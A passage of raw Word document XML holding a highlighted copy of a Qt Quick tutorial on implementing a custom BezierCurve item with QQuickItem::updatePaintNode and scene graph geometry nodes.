          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when it is time for the QML scene to be synchronized with the rendering scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BezierCurve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BezierCurve</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00DC2BC3" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The BezierCurve class has no data members that need to be cleaned up so the destructor does nothing. It is worth mentioning that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rendering scene graph i</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s managed by the scene graph it</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>potentially in a different thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>one should never retain</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2125" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>references in the</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2126" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class nor try to clean them up explicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMPORTANT RECOMMENDATION.</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu about QSGNode.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</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BezierCurve</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setP1</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const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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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if</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p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m_p1</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return</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m_p1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emit p1Changed</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update</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2BC3" w:rsidRPr="00DC2BC3" w:rsidRDefault="00AE08BB" w:rsidP="00DC2BC3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The setter function for the p1 property checks if the value is unchanged and exits early if this is the case. Then it updates the internal value and emits the changed signal. It then proceeds to call the</w:t>
      </w:r>
      <w:r w:rsidR="00DC2BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2127" w:anchor="update" w:history="1">
        <w:r w:rsidRPr="00DC2BC3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function which will </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>notify the rendering scene graph, that the state of this object has changed and needs to be synchronized with the rendering scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call to update() will result in a call to</w:t>
      </w:r>
      <w:r w:rsidR="00324544" w:rsidRPr="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2128" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() at a later time</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The other property setters are equivalent, and are omitted from this example.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSGNode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BezierCurve</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updatePaintNode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QSGNode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oldNode</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UpdatePaintNodeData</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QSGGeometryNode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node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QSGGeometry</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geometry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if</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oldNode</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        node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new</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QSGGeometryNode</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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updatePaintNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function is the pri</w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mary integration point for synchronizing the state of the QML scene with the rendering scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The function gets passed a</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2129" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which is the instance that was returned on the last call to the function. It will be null the first time the function gets called and we create our</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2130" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which we will fill with geometry and a material.</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geometry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new</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QSGGeometry</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QSGGeometry</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defaultAttributes_Point2D</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m_segmentCount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geometry</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setLineWidth</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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geometry</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setDrawingMode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QSGGeometry</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DrawLineStrip</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node</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setGeometry</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geometry</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        node</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setFlag</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QSGNode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OwnsGeometry</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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We then </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create the geometry and add it to the node</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The first argument to the</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2131" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">constructor is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>definition of the vertex type</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, called an "</w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute set</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">". Since the graphics often used in QML centers around a few common </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard attribute sets</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, these are </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provided by default</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here we use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Point2D</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute set which has two floats, one for x coordinates and one for y coordinates. The second argument is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vertex count</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
